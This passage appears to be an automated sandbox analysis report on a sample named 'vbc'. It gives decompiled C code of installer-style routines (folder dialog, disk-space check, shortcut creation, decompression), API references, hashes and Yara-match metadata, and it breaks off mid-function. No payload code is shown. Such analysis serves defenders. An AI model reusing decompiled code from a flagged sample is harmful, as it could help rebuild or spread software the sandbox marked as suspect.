				_t146 = ( *_t2 << 0xb) + 0x436000;
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x0040498a
0x00404990
0x00404996
0x0040499a
0x0040499d
0x004049a3
0x004049b1
0x004049b4
0x004049bc
0x004049c2
0x004049c2
0x004049ce
0x004049d1
0x00404a3f
0x00404a46
0x00404b1d
0x00404b24
0x00404b33
0x00404b33
0x00404b37
0x00404b41
0x00404b4e
0x00404b50
0x00404b50
0x00404b5e
0x00404b65
0x00404b6c
0x00404b6f
0x00404bab
0x00404bad
0x00404bb3
0x00404bb8
0x00404bbc
0x00404bbe
0x00404bbe
0x00404bda
0x00000000
0x00404bdc
0x00404bdf
0x00404bed
0x00404bf3
0x00404bf4
0x00404bf7
0x00404bfa
0x00000000
0x00404bfa
0x00404b71
0x00404b73
0x00404b77
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b79
0x00404b79
0x00404b86
0x00404b8b
0x00000000
0x00000000
0x00404b8f
0x00404b91
0x00404b91
0x00404b9a
0x00404b9c
0x00404ba1
0x00404ba4
0x00404ba9
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ba9
0x00404c06
0x00404c10
0x00404c13
0x00404c16
0x00404c1d
0x00404c1d
0x00404c1f
0x00404c1f
0x00404c24
0x00404c26
0x00404c2e
0x00404c35
0x00404c37
0x00404c42
0x00404c42
0x00404c37
0x00404c52
0x00404c5c
0x00404c64
0x00404c7f
0x00404c66
0x00404c6f
0x00404c6f
0x00404c64
0x00404c84
0x00404c89
0x00404c8e
0x00404c97
0x00404c97
0x00404ca0
0x00404ca2
0x00404ca2
0x00404cae
0x00404cb6
0x00404cc0
0x00404cc0
0x00404cc5
0x00000000
0x00404cc5
0x00404b6f
0x00404b26
0x00404b2d
0x00000000
0x00000000
0x00000000
0x00404b2d
0x00404a4c
0x00404a55
0x00404a6f
0x00404a74
0x00404a7e
0x00404a85
0x00404a91
0x00404a94
0x00404a97
0x00404a9e
0x00404aa6
0x00404aa9
0x00404aad
0x00404ab4
0x00404abc
0x00404b16
0x00404abe
0x00404abf
0x00404ac6
0x00404ad0
0x00404ad8
0x00404ae5
0x00404af9
0x00404afd
0x00404afd
0x00404af9
0x00404b02
0x00404b0f
0x00404b0f
0x00404abc
0x00000000
0x00404a74
0x00404a62
0x00000000
0x00000000
0x00404a68
0x00000000
0x004049d3
0x004049e0
0x004049e9
0x004049f6
0x004049f6
0x004049fd
0x00404a03
0x00404a0c
0x00404a0f
0x00404a12
0x00404a1a
0x00404a1d
0x00404a20
0x00404a26
0x00404a2d
0x00404a34
0x00404ccb
0x00404cdd
0x00404a3a
0x00404a3d
0x00000000
0x00404a3d
0x00404a34

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32 ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 00404AF1
lstrcatW.KERNEL32 ref: 00404AFD
SetDlgItemTextW.USER32 ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404BD2
MulDiv.KERNEL32 ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03

Strings

Call, xrefs: 00404AEB, 00404AF0, 00404AFB
A, xrefs: 00404AAD

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$Call
API String ID: 2624150263-209694386
Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0369DAF1 Relevance: 7.7, Strings: 5, Instructions: 1470COMMON

Download Yara Rule

Strings

e74D, xrefs: 036979D5
0c5, xrefs: 03697BB7
wq, xrefs: 036982DC
'v, xrefs: 03698228
;T, xrefs: 03698749

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: 'v$0c5$e74D$;T$wq
API String ID: 0-3045091586
Opcode ID: 20cc3292f6dfb51b72b43893d88ecf9100979e457fd8be11a23db72056f06f77
Instruction ID: 7c20e42f58d54e89c2b236dc6b7f9f9d295811ea6bce1a522ef63bc67cb6c3f0
Opcode Fuzzy Hash: 20cc3292f6dfb51b72b43893d88ecf9100979e457fd8be11a23db72056f06f77
Instruction Fuzzy Hash: 08C235716083868FEF34CF38CD947DA7BA6AF56350F49826ECC898B255D3358546CB12

Uniqueness

Uniqueness Score: -1.00%

Function 03698AD9 Relevance: 7.2, Strings: 5, Instructions: 966COMMON

Download Yara Rule

Strings

e74D, xrefs: 036979D5
0c5, xrefs: 03697BB7
wq, xrefs: 036982DC
'v, xrefs: 03698228
;T, xrefs: 03698749

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: 'v$0c5$e74D$;T$wq
API String ID: 0-3045091586
Opcode ID: c5b93af5d3f748f2c2d8f000dc140b3b29af5d9487243c7087bb4018d7c08fef
Instruction ID: 25c7509f4a2ea68d004c9b33afbeeba85f2dc0b3c78e990a6681f1d85fcff5f8
Opcode Fuzzy Hash: c5b93af5d3f748f2c2d8f000dc140b3b29af5d9487243c7087bb4018d7c08fef
Instruction Fuzzy Hash: 0382207160434ADFEF34DE28CD557EA77A6FF96350F45812EDC898B214D3358A828B42

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?), ref: 00402229

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
Opcode Fuzzy Hash: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
Opcode Fuzzy Hash: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29

Uniqueness

Uniqueness Score: -1.00%

Function 03699462 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

`, xrefs: 036995CE

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 2094973fd7ae787005b5e659ad483c6184e69c89b01f3d58f42997b2c230219c
Instruction ID: e19fede8dca4882fd84a1c6286fe35e86f05a2c4a4c0da2f100fddac141ace62
Opcode Fuzzy Hash: 2094973fd7ae787005b5e659ad483c6184e69c89b01f3d58f42997b2c230219c
Instruction Fuzzy Hash: 963127B5504398CBEFB4CE2988193DE32FAAF51320F85401FCC4A6B645DB311A4ACF16

Uniqueness

Uniqueness Score: -1.00%

Function 00406D85 Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
